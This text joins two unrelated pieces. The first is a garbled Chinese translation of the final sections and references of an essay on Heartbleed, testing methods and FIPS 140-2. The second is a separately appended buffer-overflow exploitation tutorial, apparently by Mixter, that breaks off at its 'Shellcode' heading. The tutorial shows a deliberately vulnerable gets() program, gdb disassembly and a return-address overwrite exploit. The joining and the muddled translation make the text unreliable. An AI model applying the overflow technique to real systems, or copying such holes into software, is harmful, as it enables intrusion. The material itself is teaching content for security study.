六、应用这些方法

正如我前面提到的，开发安全软件需要的工具和方法的结合。当有错误时，要弄清楚发生了什么，我们需要了解它们失败的原因，并要试图做的更好。

这不是一个很好的时机来使用加密库。这些库是很重要的，但是最近发现了很多的问题：

1、本文的重点是OpenSSL中的心脏出血漏洞。

2、苹果的iOS遇到了漏洞，这是一个简单的故障来检查无效的证书。这些漏洞可能已经通过各种机制，包括静态死代码检测器，测试覆盖工具，或是无效认证的否定测试。

3、GnuTLS也不能正确的认证证书，其次，似乎有可能检测到这个在代码公布之前，其中包括否定测试。

4、OpenSSL CCS的注入。其中一些精心制作的可能会导致密钥的成为弱项。Masashi Kikuchi已经分别描述了他是怎么发现这个漏洞的。他首先想到了使用Coq来证明使用的正确性。他专注于过度的CCS，然后检查如何验证代码转变条件。他发现OpenSSL不能验证失败的情况，并且发现了漏洞。

5、一个随机数生成器不能在OpenSSL运行，值得注意的是，可以通过它来检查这个错误，所有的基本工程测试已经掌握了这一点。

许多人依靠加密库但是评估这些要有专业的知识，美国政府已经建立了一套流程来评估加密模块，称为FIPS 140-2。我认为这是个好方法来广阔的评价这些很重要并且难评估的项目。

这有更重要的事情，虽然符合FIPS 140-2进程，但是不检查加密协议，包括SSL/TLS的实现。相反，当前的FIPS 140-2进程只能计算它在密码库内的算法和检测在密码模块内的方案。我没有说清楚这个旧版本的文本，我希望弄清这些事。作为实施指南的FIPS PUB 140-2和加密模块验证程序的有效性。“该加密模块可以实现在安防行业已知的各种协议。这些协议的例子是IKE, TLS, SSH, SRTP, SNMP和TPM，在NIST SP 800-135rev1列出来。FIPS 140-2以及其附件没有解决方案，只有在加密算法和方案被认可和允许时，这些在操作模式下使用。”

实际上，OpenSSL坚持使用FIPS 140-2认证，它修复了心脏出血漏洞由于使用了附加的技术。FIPS 140-2进程不能评估正常的OpenSSL代码，只是评估了叫OpenSSL FIPS对象模块的特别的软件模块。OpenSSL FIPS对象模块有一样的接口，并且从OpenSSL代码中衍生出来，但它还是一个单独的模块。开启“FIPS模式”来结束FIPS模块代码，而不是使用常规的OpenSSL代码来实现加密。因此OpenSSL FIPS对象模块可以保持其通过FIPS 140-2的认证，即修复心脏出血漏洞，这是因为FIPS 140-2进程不评估SSL/TLS协议，因为不符合FIPS某块的代码必须要修改。在其他方面不同的情况下发生的。通常情况下，任何的加密模块的改变都不能导致验证的损失，这就需要很长的时间和金钱来得到一个新的验证。亏损的危险就是一个反常的激励：加密模块的开发人员有一个强烈的动机来区分问题。如果这是正确的，我可以肯定OpenSSL开发人员和FIPS的使用者和高兴。这就意味着心脏出血漏洞能够很快的得到修复在符合FIPS时，我确认在2014-05-09理解NIST。

因此通过设计FIPS 140-2进程中没有通过SSL/TLS来实现的包括加密协议在内，我觉得这公平来询问，但是，如果要注意保密协议。正确的评估加密协议需要相同类型的专业知识和其他的加密代码。很容易创建和运行一个大的测试套件来对抗如SSL/TLS的标准协议。这并不奇怪，验证过程没有发现随机数生成器的失败。我想通过FIPS 140-2进程至少是使用动态测试每一个支持加密随机数的生产器，从而确保他们是随机的，并且可以避免常见的错误。这将不花费很多和提供了一些信心，如果FIPS 140-2进程不能延长审查加密协议，那么事情应该建立来审查这些。一般情况下，我们需要重新测试FIPS 140-2来使它运行的更快更彻底。当前的进程使它很难更新库，如让一个人得到了关于安全和兼容性的结论。

没有测试过程中可以找到所有的问题，所以期待的完美是不合理的。不过，存在这新的技术来评估保密代码，这就会增加速度减少成本。更重要的是，我们都需要对攻击者的学习来增进当前评估过程来对抗容易忽略的漏洞。我的目标不是来毁掉现有的各种评估进程，评估是一项很难的任务。我的目标是要弄清楚做什么可以改善这些事情，因为加密是最重要的。

需要更严格和透明的程序来测试加密协议，一个要求对安全漏洞进行更新和公开的更新程序来防止复发。我能够很容易的看到FLOSS项目来创建一个更严格的测试套件，指的是通过密码库的使用和用户的关注程度。

我想我应该提一下FLOSS。有些人曾经试图宣称心脏出血漏洞在一个FLOSS不能创建好软件的证据。这没有意义，在专有软件中也发现了漏洞，在2013年，Coverity的扫描报告中发现“开源代码的质量优于专有的C/C++项目。”在现实中一些FLOSS程序是安全的，但是专有软件就不是很安全了。FLOSS有些潜在的安全优点，但是他们只是潜在的，你必须要检测特定的软件来确定它是否适合您的需要，包括它的安全性。

Eric S. Raymond把下面这叫做“Linus’ Law”：“使用一个足够大的β测试和联合的开发基础，几乎所有的问题很快的成型和修复就变得很明显了。”或是不正规的“只要你认真的寻找就会发现漏洞。”但是，这不意味着一些人想要。首先Raymond截然不同的发展FLOSS；他不是在谈论FLOSS和非FLOSS。其次，注意到更小心的措施需要“足够多的联合开发人员”基础；加密学使得得到一个大的开发者基础成为问题，并且非标准的OpenSSL证书有可能抑制了合作开发人员的数量。第三，注意这些文字“几乎每个问题都会很快的形成”，他从来没有声称发现了所有了问题，或是他们很快的被发现。最后，文中指出事实证明传统的方法在发现和对抗这些问题时不会奏效，虽然有很多的工具和方法来分析OpenSSL。相反，系统问题来发现类似的漏洞，因为不同的人使用类似的假设。好的消息是我们可以找到漏洞并且修复这些漏洞，因为漏洞的成因是公开讨论的。在大的设置中，本文代表了人们识别系统的问题来修复他们，从而类似的漏洞会很快的发现和修复。

本文着重关注如何应对技术。然而这里还有很多的非技术问题。Summer Maynard的“什么能让心脏出血可以教导OSS社区的市场营销”，这就展示了心脏出血是怎么被推销的。市场营销是很重要的；心脏出血是一个很糟糕的漏洞，好的营销加快的反应速度和降低了伤害。项目可以帮助关键的部件，这些有潜在问题的；核心的设施要数百万的美元来资助开源项目，这个项目是核心计算机功能的关键路径，这收心脏出血漏洞启发的。

七、范例

那么是不是有做的很好的例子？毕竟容易引起抱怨，但是如果没有人可以做的很好，那么这应该是不可能的。此外，如果没有可以复制的例子，就很难学习怎么做了。

我要求人们在可靠性和安全性方面来区分强大的FLOSS例子。当然，一个程序会有一个强劲的投入和不安全性。此外，即时是好的系统也偶尔会有问题的。这是一个很好的想法来看这些例子，因为很容易使用类似的方法在你在实际运行中。这有一些人们确定的项目：

OpenBSD。OpenBSD渴望成为安全领域的第1。他们由一个6-12人的队伍来进行安全审计：“我们不能找到很多的安全漏洞，因为我们正在找软件的基本问题，使用很长时间后人们才会发现安全问题，之后修复这些问题。在系统的任何领域都会发现漏洞。在我们审计中发现了在安全问题中新的类，而且往往这些较早审核的源代码需要重新设计时要考虑到这些漏洞。代码要经过多次的审核，并且由很多人使用不同的方法来审核，另一个安全的审核过程就是他们的积极性。在很多的条件下，我们发现对于开发的决心不是一个问题。在我们的审计过程中，我们发现了很多的问题，并且我们努力解决这些问题，即时没有得到证实。” 他们试图创建并实施对抗这些漏洞的新方法，包括strlcpy()/strlcat()，保护页面，和随机malloc()。他们还在“默认安全”下工作，同时进行全面的披露。

OpenSSH。OpenSSH是实现SSH协议和密钥连接的工具。OpenSSH是在OpenBSD项目的两个团队开发的。一个团队做基于OpenBSD的开发，其他的团队需要运行这个版本在许多操作系统上运行。OpenSSH使用的是OpenBSD的安全开发流程。OpenSSH的开发人员一直在努力降低OpenSSH被攻击的可能性。他们的方法有防御性程序，使用独立的库来减少复杂性，轻度的改变协议来减少攻击，特权分离，通过改变程序来最大化的缓解在操作系统的攻击。想要了解更多的OpenSSH的权限分离可以查阅Provos2003。

SQLite。SQLite是通过使用非常积极的测试方法来获得可靠性。该项目的代码行中超过了1000的测试代码和测试脚本。他们的作为包括三个独立开发的测试工具，异常测试，fuzz测试，回归测试，自动资源泄露测试，100%分支测试和MC/DC覆盖测试，数以百万的测试方案，广泛的使用assert()和运行时间检查，Valgrind分析，整数溢出检查，开发者清单。他们没有编译警告，在警告开启或是使用Clang静态分析工具。在2014.5.10，Peter Gutmann告诉我：“我一直使用SQLite完成我专业级软件开发，我谈论了怎么开发和测试它，在受到强烈的影响下。”

Postfix。我注意到Elaine R. Palmer和Bill Cheswick认为他们对安全和可靠性都全面的了解。Postfix的方法来开发安全软件重点在于存在一个非常有经验的团队，从头开始编写到安全，涉及到一组守护进程分别执行不同任务的集体结构。Postfix使用C和POSIX的安全子集，并结合创建安全的替代品的一个抽象层。例如，它有一个“vstring”创始人的帮助来缓解缓冲区溢出的攻击和“safe open”创始人来阻止竞赛条件。

GPSD。全球定位系统服务守护进程。这使用了大量的回归测试，使用多个工具的严格的静态测试和可以减少风险的构架方式。他们使用一个自定义的框架来拓展回归测试套件，包括使用诸如valgrind工具。他们的静态分析工具包括splint，cppcheck和Coverity；他们说道：“我们不知道没有比GPSD更强大的套件，包括全部的splint注解，并强烈怀疑没有存在。”或许更重要的是，他们的设计没有缺陷。Eric Raymond说到，“如果移动或是主机不是Windows，GPSD肯定可以运行，在世界上所有的智能手机的GPS监控，DARPA挑战一个重要的航海系统，从无人驾驶汽车开始，还有大多数的无人机和机器人，只有CVE和在十年内没有任何的漏洞。在几个月的时间内没有任何的缺陷报告，GPSD是使用传统C的基础，从而可以使你非常接近不用判断。我得到了疯狂的回归测试和常规的四个静态分析器。”

这当然不是一个完整的清单，他们中的漏洞会被发现的。尽管如此，它指向用来提高安全性和可靠性的项目，以及他们是如何工作的，让别人找到什么值得模仿。

八、结论和建议

有几种方法可以发现心脏出血漏洞，在这漏洞软件发布之前。这不是一个真对OpenSSL开发人员的，他们在一直的努力减少漏洞的数量，包括审计的人数和工具。相反，本文是来帮助改善的，OpenSSL和其他的项目可以通过改变他们如何开发和评估软件来阻止将来类似的漏洞发生。

我们已经学了一个重要的事情是许多的静态和动态分析方法使用在分析的项目中，也没有找到心脏出血漏洞。这就包括使用自动测试套件，fuzz测试方法，和典型的语句或是分支代码覆盖率的方法。几个源代码的弱点分析仪的开发人员正在改善他们的工具来检测非常类似心脏出血漏洞。我认为我们应该继续使用这些工具，但是和明显不够。想要打造安全软件项目还需要添加一下的一种方法：

1 彻底的negative测试（动态分析）

2 带地址检测和标准内存分配的fuzz（动态分析）

3 在标准内存分配器下编译和使用地址保护或是sanitizer（复合分析）

4 在各个领域内有验证是使用手动检测（静态分析）

5 上下文配置的源代码弱点分析仪，包括注释系统（静态分析）

6 100%分支覆盖率（复合分析）

7 入侵时间描述（动态分析）

8 更安全的语言（静态分析）

9 完全静态分析器（静态分析）

10 彻底的人工核实和检测（静态分析）

11 格式化方法（静态分析）

项目应该保证容易分析。例如简化代码，正常分配和释放内存，使用标准的FLOSS许可证书，这要具有广泛的兼容性。这将会是很好的使用一个编程语言，包括C，有被广泛接受的标准注释符号，从而使注释语言更容易被接受。象C语言是很难得到这样的协议的，但是我觉得要是能够使它标准化，他们就会更广泛的使用。

还有很多的方法可以减少心脏出血漏洞的影响：

1 一旦标准的内存分配器被取代，开启内存分配器的防御。在很多系统如Linux上的GNU malloc就没有这种机制，我们要首先进行添加。

2 覆盖关键信息在处理他们时。

3 使用完美的缺省的向前安全性的加密算法。

4 使用权限分离的临界加密用于其它的代码部分。

5 修复SSL/TLS的证书架构，尤其是默认证书的吊销过程。这就要协调一致的努力才能得到真正的解决方案中的规定，实施和部署；我们要从现在开始。

6 是软件升级变得简单。

7 零散的储存密码

8 一般的问题：安全软件培训和教育，降低攻击动机。

教学材料的改进和添加，特别是我们需要警告开发人员在内存缓存系统中的潜在的安全问题，在使用C，C++, 或是Objective-C；现在经常用的。当然真是的问题是开发人员学习使用安全软件，尽管几乎所有的程序都在受到攻击。

现在让我们来谈谈SSL/TLS的实现。在短时间内，我认为FLOSS项目的建立是建立在一个全面的SSL/TLS回归测试套件，使用以下的技术：

该套件要使用彻底的negative测试，它当然要有测试选项。

这将会是最好的，如果这个测试套件使用了很长的时间可以达到100%的分支覆盖，以为测试使用了多个实现方法，可以帮助检测缺失的错误输入和错误处理。

使用带地址检测和标准内存分配器的fuzz和传统的negative测试结合的方法会更好，fuzz测试可以发现许多的安全漏洞，但是传统的fuzz测试就很肤浅，并且测试效果有限，如果他们自然的应用密码协议。结合了fuzz测试和传统测试可以取得更大的进步，在协议上可以做到比单纯的fuzz测试更有效的测试。一个完全的测试工具应该可以测试到细微的错误状态。

像这样的测试套件可用多种实现方式协议来实现，但是我认为要使用SSL/TLS开始。最近，在很多的SSL/TLS的运行中发现了很多的漏洞，所有这些都可以通过negative测试来实现。如果任何加密库有漏洞，在其他保护下可以泄露数据。这个测试套件可以重启所有的SSL/TLS项目，在任何一个开发人员做出任何的改变，在他们在用户的电脑上显示很长时间以前消除他们。这个套件可以用于潜在的用户和政府，如果使用验证，可以提高供应商额外的测试来添加下一个版本。一个常见的测试套件将使我们更有信心在所有的SSL/TLS中，在开始点这些测试套件会很有用，在开始的地方便的很容易。它还有资金的优势；如果你不知道你是否支持OpenSSL，LibreSSL叉，或是其他的，这不重要-这个套件可以帮助大家。个别的项目要继续使用自己的测试套件，但是显然现在的测试套件是不够的。这也可以扩展到其他的加密协议，依赖一中技术来测试漏洞是不坏注意，包括创建一个共同的严格测试套件；我们要更多的套件才行。但是这可以说是一个好的开始。

更广泛的说，项目需要检查心脏出血的漏洞以及其他的漏洞，并且要确定他们是有效的。他们也需要检查一个项目，在这个项目做的很好时，来看使用寿命方法来复制。

这没有更好的办法。然而，这需要更重要的课程学习，要积极的使用套件才能是类似心脏出血漏洞不再发生。

九、参考文献

当前的URLs是2014.5.28。我已经把文本改成了规定的格式了，人们可以在打印版上发现重要的参考文献了。

[Ammann2008] Ammann, Paul and Jeff Offutt. Introduction to Software Testing. 2008. University Press. ISBN-13: 978-0521880381. ISBN-10: 0521880386. http://cs.gmu.edu/~offutt/softwaretest/ 

[Anderson2014] Anderson, Paul. Finding Heartbleed with CodeSonar. May 1, 2014. http://www.grammatech.com/blog/finding-heartbleed-with-codesonar 

[Appel2014] Appel, Andrew W. Verification of a Cryptographic Primitive: SHA-256 http://www.cs.princeton.edu/~appel/papers/verif-sha.pdf 

[Apple2013] Apple. Apple Automatic Reference Counting (ARC). “Transitioning to ARC Release Notes.” August 2013. https://developer.apple.com/library/mac/releasenotes/ObjectiveC/RN-TransitioningToARC/Introduction/Introduction.html 

[ArcaneSentiment2014] Arcane Sentiment. A sound bug finder is an unsound correctness prover. 2014. http://arcanesentiment.blogspot.se/2014/04/a-sound-bug-finder-is-unsound.html 

[BAH2009] Booz Allen Hamilton. Software Security Assessment Tools Review. March 2, 2009. http://samate.nist.gov/docs/NAVSEA-Tools-Paper-2009-03-02.pdf 

[BenchmarksGame] Benchmarks Game. http://benchmarksgame.alioth.debian.org/u32/which-programs-are-fastest.php 

[Bessey2010] Bessey, Al, Ken Block, Ben Chelf, Andy Chou, Bryan Fulton, Seth Hallem, Charles Henri-Gros, Asya Kamsky, Scott McPeak, and Dawson Engler. A Few Billion Lines of Code Later: Using Static Analysis to Find Bugs in the Real World. Communications of the ACM, Vol. 53 No. 2, Pages 66-75. 2010. http://cacm.acm.org/magazines/2010/2/69354-a-few-billion-lines-of-code-later/fulltext 

[Brumley] Brumley, David and Dawn Song. Privtrans: Automatically Partitioning Programs for Privilege Separation. http://users.ece.cmu.edu/~dawnsong/papers/privtrans.pdf 

[Butler] Butler, Ricky W. “What is Formal Methods?” http://shemesh.larc.nasa.gov/fm/fm-what.html 

[Cassidy2014] Cassidy, Sean. Diagnosis of the OpenSSL Heartbleed Bug. 2014-04-07. http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html 

[CASC2014]. Certificate Authority Security Council (CASC). CASC Heartbleed Response. 2014-05-08. https://casecurity.org/2014/05/08/casc-heartbleed-response/ 

[Chou2014] Chou, Andy. “On Detecting Heartbleed with Static Analysis”. April 13, 2014. http://security.coverity.com/blog/2014/Apr/on-detecting-heartbleed-with-static-analysis.html 

[Coverity2014] Coverity. 2013 Coverity Scan Report. 2014. http://softwareintegrity.coverity.com/register-for-scan-report-2013.html?cs=pr 

[Cox2008] Cox, Russ. Lessons from the Debian/OpenSSL Fiasco. May 21, 2008. http://research.swtch.com/openssl 

[Crawford2013]. Crawford, Drew. “Why mobile web apps are slow.” July 2013. http://sealedabstract.com/rants/why-mobile-web-apps-are-slow/ 

[de Raadt] de Raadt, Theo. “Re: FYA: http://heartbleed.com/”. Newsgroup gmane.os.openbsd.misc. http://article.gmane.org/gmane.os.openbsd.misc/211963 

[Georgiev2012]. Georgiev, Martin, Subodh Iyengar, Suman Jana, Rishita Anubhai, Dan Boneh, and Vitaly Shmatikov. “The most dangerous code in the world: validating SSL certificates in non-browser software”. ACM Conference on Computer and Communications Security. 2012. pp. 38-49. 

[Gibson] Gibson, Steve. An Evaluation of the Effectiveness of Chrome’s CRLSets. 2014. https://www.grc.com/revocation/crlsets.htm 

[Goodin2014a] Goodin, Dan. March 4, 2014. “Critical crypto bug leaves Linux, hundreds of apps open to eavesdropping”. Ars Technica. http://arstechnica.com/security/2014/03/critical-crypto-bug-leaves-linux-hundreds-of-apps-open-to-eavesdropping 

[Goodin2014b]. Goodin, Dan. “How Heartbleed transformed HTTPS security into the stuff of absurdist theater: Certificate revocation checking in browsers is “useless,” crypto guru warns.” Ars Technica. 2014-04-21. http://arstechnica.com/security/2014/04/how-heartbleed-transformed-https-security-into-the-stuff-of-absurdist-theater/ 

[GNU-Licenses] GNU project. Various Licenses and Comments about Them. https://www.gnu.org/licenses/license-list.html#OpenSSL 

[Goodin2011] Goodin, Dan. “How is SSL hopelessly broken? Let us count the ways: Blunders expose huge cracks in net’s trust foundation” The Register. 2011-04-11. http://www.theregister.co.uk/2011/04/11/state_of_ssl_analysis/ 

[Gutmann] Gutmann, Peter. Experiences with SAL/PREfast https://www.cs.auckland.ac.nz/~pgut001/pubs/sal.html 

[Hatton2003]. Hatton, Les. “EC--, a measurement based safer subset of ISO C suitable for embedded system development.” 2003. Information and Software Technology, 47 (3) (2005), p. 181-187. http://www.leshatton.org/index_SA.html 

[Hatton2005] Hatton, Les. Language subsetting in an industrial context: a comparison of MISRA C 1998 and MISRA C 2004. November 20, 2005. Information and Software Technology 49 (5), p. 475-482, May 2007. http://www.leshatton.org/index_SA.html 

[Heartbleed.com] Heartbleed.com web site. 

[Hofer2010] Hofer, Thomas. Evaluating Static Source Code Analysis Tools 2010. http://infoscience.epfl.ch/record/153107/files/ESSCAT-report 

[Hsu2008] Hsu, Yating, Guoqiang Shu, and David Lee. “A Model-based Approach to Security Flaw Detection of Network Protocol Implementations” http://www.ieee-icnp.org/2008/papers/Index12.pdf 

[Jplus2014] Jplus. 2014. Approximate speed classes of programming languages. XKCD Forums. http://forums.xkcd.com/viewtopic.php?f=11&t=108685 

[Junestam2014] Junestam, Andreas and Nicolas Guigo (iSECpartners). Open Crypto Audit Project: TrueCrypt: Security Assessment. Prepared for the Open Crypto Audit Project. 2014. https://opencryptoaudit.org/reports 

[Kupsch2009] Kupsch, J. A. and Barton P. Miller. “Manual vs. automated vulnerability assessment: A case study”. The First International Workshop on Managing Insider Security Threats, West Lafayette. 2009. http://research.cs.wisc.edu/mist/papers/ManVsAutoVulnAssessment.pdf 

[Kupsch2014-April] Kupsch, James A., and Barton P. Miller. “Why do Software Assurance Tools Have Problems Finding Bugs Like Heartbleed?” https://continuousassurance.org/swamp/SWAMP-Heartbleed-White-aper-22Apr2014.pdf 

[Kupsch2014-May] Kupsch, James A., and Barton P. Miller. “Why do Software Assurance Tools Have Problems Finding Bugs Like Heartbleed?” https://continuousassurance.org/swamp/SWAMP-Heartbleed.pdf 

[Langley2014a] Langley, Adam. No, don’t enable revocation checking. 2014-04-19. https://www.imperialviolet.org/2014/04/19/revchecking.html 

[Langley2014b] Langley, Adam. Revocation still doesn’t work. 2014-04-29. https://www.imperialviolet.org/2014/04/29/revocationagain.html 

[McLoughlin2004] Mark McLoughlin, Mark. June 22, 2004. https://people.gnome.org/~markmc/openssl-and-the-gpl.html 

[Miller2005] Miller, Damien. “Secure Portability”. AUUG 2005. October 2005. http://www.openbsd.org/papers/portability.pdf or http://www.mindrot.org/~djm/auug2005/ 

[Miller2007] Miller, Damien. “Security measures in OpenSSH”. Proceedings of the AsiaBSDCon 2007, Usenix. March 2007. http://www.openbsd.org/papers/openssh-measures-asiabsdcon2007.pdf 

[NIST] NIST (SAMATE project). Tool Survey. http://samate.nist.gov/index.php/Tool_Survey.html 

[NIST-Sound] NIST. NIST SAMATE SATE V Ockham Sound Analysis Criteria. http://samate.nist.gov/SATE5OckhamCriteria.html 

[Perens1999] Perens, Bruce. “The Open Source Definition” Open Sources: Voices from the Open Source Revolution 1st Edition. January 1999. 1-56592-582-3. http://oreilly.com/catalog/opensources/book/perens.html 

[Provos2003] Provos, Niels, Markus Friedl, and Peter Honeyman. “Preventing privilege escalation”. Proceedings of the 12th USENIX Security Symposium. Pages 231-242. August 2003. https://www.usenix.org/events/sec03/tech/full_papers/provos_et_al/provos_et_al.pdf 

[Raymond1999] Raymond, Eric. “The Cathedral and the Bazaar”. The Cathedral and the Bazaar. http://www.catb.org/esr/writings/cathedral-bazaar/ - note that Linus’ law is at http://www.catb.org/esr/writings/cathedral-bazaar/cathedral-bazaar/ar01s04.html 

[Ritter2014] Ritter, Tom. iSEC Completes TrueCrypt Audit: Is TrueCrypt Audited Yet? Yes, in part! April 24, 2014. https://isecpartners.github.io/news/2014/04/14/iSEC-Completes-Truecrypt-Audit.html 

[Rohlf2014] Rohlf, Chris. 2014-04-11. My heart is ok, but my eyes are bleeding. Leaf Security Research. http://blog.leafsr.com/2014/04/11/my-heart-is-ok-but-my-eyes-are-bleeding/ 

[Ruef2014] Ruef, Andrew. Using Static Analysis And Clang To Find Heartbleed. April 27, 2014. http://blog.trailofbits.com/2014/04/27/using-static-analysis-and-clang-to-find-heartbleed/ 

[Rutkowska2013] Rutkowska, Joanna. Thoughts on Intel’s upcoming Software Guard Extensions (Part 1). August 30, 2013. http://theinvisiblethings.blogspot.com/2013/08/thoughts-on-intels-upcoming-software.html 

[Sarkar2014] Sarkar, Roy. “Saving you from Heartbleed”. April 16, 2014. http://www.klocwork.com/blog/software-security/saving-you-from-heartbleed/ 

[Schieferdecker2012] Schieferdecker, Ina, Jürgen Großmann, and Martin Schneider. Model-Based Fuzzing for Security Testing. 2012-04-21. http://www.spacios.eu/sectest2012/pdfs/SecTestICST_Schieferdecker.pdf 

[Serebryany2012] Serebryany, Konstantin, Derek Bruening, Alexander Potapenko, and Dmitry Vyukov. “Address Sanitizer: A Fast Address Sanity Checker”. USENIX ATC 2012. https://www.usenix.org/system/files/conference/atc12/atc12-final39.pdf 

[Shahriar2008] Shahriar, Hossain. Mutation-based testing of buffer overflows, SQL injections, and format string bugs. 2008. http://qspace.library.queensu.ca/handle/1974/1359 

[Spinellis2012] Spinellis, Diomidis, Vassilios Karakoidas, and Panagiotis Louridas. “Comparative language fuzz testing: Programming languages vs. fat fingers.” PLATEAU 2012: 4th Annual International Workshop on Evaluation and Usability of Programming Languages and Tools - Systems, Programming, Languages and Applications: Software for Humanity (SPLASH 2012). ACM, October 2012. (doi:10.1145/2414721.2414727) http://www.dmst.aueb.gr/dds/pubs/conf/2012-PLATEAU-Fuzzer/pub/html/fuzzer.html 

[Sutton2007] Sutton, Michael, Adam Greene, and Pedram Amini. Fuzzing: Brute Force Vulnerability Discovery. 2007. Addison-Wesley. ISBN 0-321-44611-9. 

[Takanen2008] Takanen, Ari, Jared D. Demott, and Charles Miller. Fuzzing for Software Security Testing and Quality Assurance. 2008. Norwood, MA: Artech House. ISBN-13 978-1-69693-214-2. 

[Ted] Ted. Analysis of openssl freelist reuse. http://www.tedunangst.com/flak/post/analysis-of-openssl-freelist-reuse 

[Uberti] Uberti, Justin. Untitled blog post. https://plus.google.com/+JustinUberti/posts/Ah5Gwb9jF4q 

[Wheeler2004] Wheeler, David A. Secure Programming for Linux and Unix HOWTO. 2004. http://www.dwheeler.com/secure-programs/ 

[Wheeler2013] Wheeler, David A. Vulnerability bidding wars and vulnerability economics. 2013-11-16. http://www.dwheeler.com/blog/2013/11/16/#vulnerability-economics 

[XKCD] Munroe, Randall. “Heartbleed Explanation”. XKCD. http://xkcd.com/1354/ 

随时观看我的主页http://www.dwheeler.com，您可以看下的文章“为什么OSS/FS”看看页码，和我的书《如何开发安全程序》。

一如既往，这是我的个人意见，我的意见和政府，雇主的意见不同。像往常我的写作一样，我使用是逻辑大多数黑客和维基百科都是这样做的。

（全文完）

缓冲区溢出出现在用户输入的相关缓冲区内，在一般情况下，这是现在的计算机和网络上的最大的安全隐患之一。这是因为在编程的层次上很容易出现这中问题，这对于不明白或是无法获得源代码的使用者来说是不可见的，很多的这中问题就会被利用。本文就是企图教会新手-C程序员，证明怎么利用一个溢出环境。- Mixter

一 内存

注：我这里的描述方式是在大多数计算机上内存是进程的组织者，但是它是依赖处理器体系结构的类型。这是一个x86的例子，同时也可以大致应用在sparc。

缓冲区溢出的攻击原理是不应该是重写随机输入和在进程中执行代码的内存的重写。要看在什么地方和怎么发生的溢出，让我们来看下内存是如何组织的。页面是使用自己相关地址的内存的一个部分，这就意味着内核的进程的初始化，这就没有必要知道在RAM中存储的物理地址。进程内存由下面三个部分组成：

代码段，在这一段代码中你的数据是通过汇编指令在处理器中执行的。该代码执行是非线性的，它可以跳过代码，跳跃，在某种条件下调用函数。以此，我们使用EIP指针，或是指针指令。其中EIP指向的地址总是包含下一个执行代码。

数据段，变量空间和动态缓冲器。

堆栈段，这是用来给函数传递变量的和和作为函数变量的空间。在栈的底部位于每一页的虚拟内存的尽头，同时向下增长。汇编命令PUSHL会增加到栈的顶部，POPL会从栈的顶部移除项目并且把它们放到寄存器中。要直接访问栈寄存器，在栈的顶部有栈顶指针ESP。

二 函数

函数是一段代码段的代码，当被调用执行一个任务，之后返回执行的前一个主题。或是，把参数传递给函数，在汇编语言中，通常看起来是这样的。

memory address                       code

0x8054321               pushl $0x0

0x8054322                              call $0x80543a0 

0x8054327                              ret

0x8054328                              leave

...

0x80543a0               popl %eax

0x80543a1                              addl $0x1337,%eax

0x80543a4                              ret

这会发生什么？主函数调用了function(0)；

变量是0，主要把它压入栈中，同时调用该函数。该函数使用popl来获取栈中的变量。完成后，返回0x8054327。通常，主函数要把EBP寄存器压入栈中，主要是储存和在结束后在储存。这是帧指针的概念，即允许函数使用自己的偏移地址，在对付攻击时就变的很无趣了。因为函数将不会返回到原有的执行线程。

我们只需要知道栈。在顶部，我们有函数的内部缓冲区和变量。在此之后，有保存的EBP寄存器（32位，4个字节），然后返回地址，是另外的4个字节。再往下，还有要传递给函数的参数，这对我们没有用。

在这种情况下，我们返回的地址是0x8054327。在函数被调用时，它就会自动的存储到栈中。如果代码中存在溢出的地方，这个返回值会被覆盖，并且指针指向下内存中的下一个位置。

三 一个可以利用的程序实例

让我们假设我们要利用的函数为：

void lame (void) { char small[30]; gets (small); printf("%s\n", small); }

main() { lame (); return 0; }

Compile and disassemble it:

# cc -ggdb blah.c -o blah

/tmp/cca017401.o: In function `lame':

/root/blah.c:1: the `gets' function is dangerous and should not be used.

# gdb blah

/* short explanation: gdb, the GNU debugger is used here to read the

   binary file and disassemble it (translate bytes to assembler code) */

(gdb) disas main

Dump of assembler code for function main:

0x80484c8 :       pushl  %ebp

0x80484c9 :     movl   %esp,%ebp

0x80484cb :     call   0x80484a0

0x80484d0 :     leave

0x80484d1 :     ret

(gdb) disas lame

Dump of assembler code for function lame:

/* saving the frame pointer onto the stack right before the ret address */

0x80484a0 :       pushl  %ebp

0x80484a1 :     movl   %esp,%ebp

/* enlarge the stack by 0x20 or 32. our buffer is 30 characters, but the

   memory is allocated 4byte-wise (because the processor uses 32bit words)

   this is the equivalent to: char small[30]; */

0x80484a3 :     subl   $0x20,%esp

/* load a pointer to small[30] (the space on the stack, which is located

   at virtual address 0xffffffe0(%ebp)) on the stack, and call

   the gets function: gets(small); */

0x80484a6 :     leal   0xffffffe0(%ebp),%eax

0x80484a9 :     pushl  %eax

0x80484aa :    call   0x80483ec

0x80484af :    addl   $0x4,%esp

/* load the address of small and the address of "%s\n" string on stack

   and call the print function: printf("%s\n", small); */

0x80484b2 :    leal   0xffffffe0(%ebp),%eax

0x80484b5 :    pushl  %eax

0x80484b6 :    pushl  $0x804852c

0x80484bb :    call   0x80483dc

0x80484c0 :    addl   $0x8,%esp

/* get the return address, 0x80484d0, from stack and return to that address.

   you don't see that explicitly here because it is done by the CPU as 'ret' */

0x80484c3 :    leave

0x80484c4 :    ret

End of assembler dump.

3.1 程序溢出

# ./blah

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx    <- user input

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

# ./blah

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Segmentation fault (core dumped)

# gdb blah core

(gdb) info registers

     eax:       0x24          36

     ecx:  0x804852f   134513967

     edx:        0x1           1

     ebx:   0x11a3c8     1156040

     esp: 0xbffffdb8 -1073742408

     ebp:   0x787878     7895160

EBP是0x787878，这就意味我们已经写入了超出缓冲区输入可以控制的范围。0x78的x是十六进制的标志。该过程有32个字节的最大的缓冲器。我们已经在内存中写入了比用户输入更多的数据，因此重写EBP和返回值的地址是'xxxx'，这个过程会尝试在地址0x787878处重复执行，这就会导致段的错误。

3.2 改变返回值地址

让我们尝试利用这个程序来返回lame()，我们要改变返回值的地址从0x80484d0到0x80484cb，在内存中，我们有32字节的缓冲区空间|4个字节保存EBP|4个字节的RET。下面是一个很简单的程序，把4个字节的返回地址变成一个1个字节字符缓冲区：

main()

{

int i=0; char buf[44];

for (i=0;i<=40;i+=4)

*(long *) &buf[i] = 0x80484cb;

puts(buf);

}

# ret

ËËËËËËËËËËË,

# (ret;cat)|./blah

test         <- user input

ËËËËËËËËËËË,test

test         <- user input

test

我们在这里使用这个程序通过了函数两次。如果有溢出存在，函数的返回值地址是可以变的，从而改变程序的执行线程。

4 Shellcode

